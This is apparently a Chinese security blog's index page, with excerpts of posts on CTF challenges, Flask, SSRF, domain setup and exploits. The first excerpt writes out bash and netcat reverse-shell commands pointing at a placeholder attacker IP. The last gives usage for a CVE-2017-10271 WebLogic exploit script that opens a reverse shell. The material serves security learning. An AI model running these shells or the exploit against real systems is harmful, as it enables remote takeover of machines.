Dust to Dust

摘要： linux自带的bash反弹shell在攻击机行执行nc -lvvp 12345 来监听端口在目标机上执行bash -i >& /dev/tcp/攻击机IP/12345 0>&1复杂一点的还可以用exec 5/dev/tcp/攻击机地址/12345;cat &5 2>&1;donePython反弹shell攻击机继续监听，目标机上执行python -c 'import socket,subpr... 阅读全文

摘要： 这里面就放一张百度百科的解释吧,emmm反正我是看不懂还是做一下题来巩固一下吧CTF中的hash长度攻击进入网页你会发现页面显示我这里没有看到什么可以利用的，抓了一下包也没有什么有可以利用的东西,扫一下目录看看，这里面我用的是一个专门扫描敏感文件的工具.有兴趣的同学可以去看一下.工具在这里使用方法：python3 1.py url 16 32OK通过扫描我们发现一个index.php~的文件，... 阅读全文

摘要： 什么是Flask Flask是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ，模板引擎则使用 Jinja2 。Flask使用 BSD 授权。 如何使用它 这里面我们简单的编写一个Hello World程序来观察一下。 里面有这么几个文件及文件夹 阅读全文

摘要： 最近无聊在做一下杂项，随便总结一下关于杂项的知识。 一. xcaliflag 这个直接拖进stegsolve里面，大约是在Blue的第3位左右就很清楚了 二. 阅读全文

摘要： 这种题目是比较简单地。。直接写个小脚本就行了2333 阅读全文

摘要： 果然还是我太菜了呜呜呜，这道题仍然是没有自己做出来。哎。 这一道用的并不是PHP的环境，而是用Python中的Django编写的。 记得做过类似的一道题目。来源于MOCTF中的网站扫描器,当时做完后其实一回想，后台用的应该是file_get_contents类似的函数，还应该开启了远程包含之类的。然 阅读全文

摘要： 这道题的话，看了一下是RCTF-2015的原题。。。。可是这也太难了吧QAQ，文件名作为注入点可也是太秀了，害的我一直以为是文件上传QAQ,并且这道题的坑还不少，就是注入时的输出只能为10进制。。。。。这也就是说还需要你进行一下进制转换。。。 还有这里面将select和from过滤了一次。。。你还需 阅读全文

摘要： 在网上找到的方法，跟着搭建了一下。成功了。 搭建域控：https://jingyan.baidu.com/article/d169e186a68724436611d8f3.html 将其他的机器加入域中: https://blog.csdn.net/niexinming/article/detail 阅读全文

摘要： 自己最近原本是想深入的学习一下关于xss、csrf的东西的，可是感觉这些东西需要有很好的js的基础来进行学习。。还有感觉自己感觉也差不多该要学习内网渗透了。。正好ssrf在内网这一块也是比较有用的。于是现在学习一下。 我这里面是以php里面的curl为例子来学习的。 漏洞代码如下 一般这种请求都需要 阅读全文

摘要： 使用方法: 反弹shell : python3 exp.py http://xxxx:7001/ CVE_2017_10271_Shell host port（后面的是你自己反弹Shell的主机ip以及端口） Weak密码检测: python3 exp.py http://xxxx:7001/ We 阅读全文